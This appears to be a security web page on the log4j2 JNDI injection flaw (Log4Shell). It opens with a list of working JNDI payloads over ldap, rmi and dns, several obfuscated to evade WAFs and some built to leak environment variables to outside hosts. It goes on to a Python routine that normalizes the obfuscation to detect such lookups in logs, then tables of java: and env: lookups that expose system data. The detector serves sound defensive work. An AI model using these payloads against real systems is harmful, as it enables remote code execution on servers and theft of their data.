log4j2 supports many protocols, for example looking up variables via ldap or via docker. Judging from the tests people have shared online, ldap is the protocol mainly used to construct the payload; for details see here:
1. Common payloads
${jndi:ldap://127.0.0.1:1389/ Badclassname}
${jndi:ldap://xxx.xxx.xxx.xxx/exp} // Windows
${jndi:dns://${env:OS}.dnslog.com}
${jndi:dns://${env:USERNAME}.dnslog.com} // bypasses WAF
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://xxxxxxx.xx/poc}
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://127.0.0.1:1389/Exploit.class}
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://asdasd.asdasd.asdasd/poc}
${${::-j}ndi:rmi://asdasd.asdasd.asdasd/ass}
${jndi:rmi://adsasd.asdasd.asdasd}
${${lower:jndi}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:${lower:jndi}}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://adsasd.asdasd.asdasd/poc}
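As an added example that is not part of the original page, the Python below undoes the lower:/upper: and `${::-x}` obfuscation tricks shown in the payloads above and flags log lines that still contain a `${jndi:` lookup once normalized, which is what a log-review or WAF-tuning rule needs to key on. The sample lines are constructed; the hosts in them are the placeholders this page uses.

```python
import re
JNDI_RE = re.compile(r"\$\{jndi:", re.IGNORECASE)

def _evaluate(inner):
    """Evaluate one ${...} whose nested lookups are already resolved: lower:/upper: are
    applied; '${...:-default}' yields the default (the ${::-j} trick, or a lookup assumed
    to fail); any other lookup (jndi:, env:, java:, ...) is kept verbatim."""
    key, sep, default = inner.partition(":-")
    prefix, _, arg = key.partition(":")
    prefix = prefix.lower()  # Log4j lower-cases the lookup prefix
    if prefix == "lower":
        return arg.lower()
    if prefix == "upper":
        return arg.upper()
    if sep and prefix != "jndi":
        return default
    return "${" + key + "}"

def _parse(s, i, nested):
    """Resolve s[i:] up to an unmatched '}' (when nested) or the end of the input;
    returns (resolved_text, index just past the consumed input)."""
    out = []
    while i < len(s):
        if s.startswith("${", i):
            inner, i = _parse(s, i + 2, True)  # innermost lookups resolve first
            out.append(_evaluate(inner))
        elif nested and s[i] == "}":
            return "".join(out), i + 1
        else:
            out.append(s[i])
            i += 1
    return "".join(out), i

def normalize(text):
    """Collapse nested and obfuscated lookups in one log line to their plain form."""
    return _parse(text, 0, False)[0]

def is_jndi_lookup(text):
    """True when the line, once normalized, still contains a JNDI lookup."""
    return JNDI_RE.search(normalize(text)) is not None

# Constructed sample lines (not captured from a real system); payload shapes from this page.
SAMPLE_LINES = [
    "UA: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://127.0.0.1:1389/Exploit.class}",
    "UA: ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}://xxxxxxx.xx/poc}",
    "UA: Mozilla/5.0 (build ${env:USER})",
]

def flag_lines(lines=SAMPLE_LINES):
    """Return (normalized_line, flagged) for each line."""
    return [(normalize(line), is_jndi_lookup(line)) for line in lines]
```

Unmatched braces at the top level are kept literally, so a line like the mis-braced variant above still normalizes to a detectable `${jNdI:rmi}` prefix.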
log4j-java
| ID | usage | method |
|---|---|---|
| 1 | ${java:version} | getSystemProperty("java.version") |
| 2 | ${java:runtime} | getRuntime() |
| 3 | ${java:vm} | getVirtualMachine() |
| 4 | ${java:os} | getOperatingSystem() |
| 5 | ${java:hw} | getHardware() |
| 6 | ${java:locale} | getLocale() |
Linux
| id | usage |
|---|---|
| 1 | ${env:CLASSPATH} |
| 2 | ${env:HOME} |
| 3 | ${env:JAVA_HOME} |
| 4 | ${env:LANG} |
| 5 | ${env:LOGNAME} |
| 6 | ${env:MAIL} |
| 7 | ${env:PATH} |
| 8 | ${env:PWD} |
| 9 | ${env:SHELL} |
| 10 | ${env:USER} |
Windows
| id | usage |
|---|---|
| 1 | ${env:A8_HOME} |
| 2 | ${env:A8_ROOT_BIN} |
| 3 | ${env:CLASSPATH} |
| 4 | ${env:JRE_HOME} |
| 5 | ${env:Java_Home} |
| 6 | ${env:LOGONSERVER} |
| 7 | ${env:OS} |
| 8 | ${env:Path} |
| 9 | ${env:USERDOMAIN} |
| 10 | ${env:USERNAME} |
log4j2-sys